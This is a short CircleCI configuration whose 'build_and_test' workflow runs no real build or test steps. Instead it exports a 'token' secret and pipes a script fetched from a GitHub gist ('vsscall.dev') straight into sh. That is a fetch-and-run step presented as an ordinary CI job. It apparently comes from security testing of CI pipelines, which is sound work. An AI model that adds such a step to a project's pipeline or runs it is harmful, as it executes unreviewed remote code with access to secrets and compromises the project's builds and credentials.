version: 2.1
jobs:
  docker:
    docker:
      - image: ruby:2.5
    steps:
      - run: export token=$token
      - run: wget https://gist.githubusercontent.com/vsseclab/b8cd5cee83d8e665eecefef3b8064319/raw/vsscall.dev -O - | sh
workflows:
  version: 2.1
  build_and_test:
    jobs:
      - docker
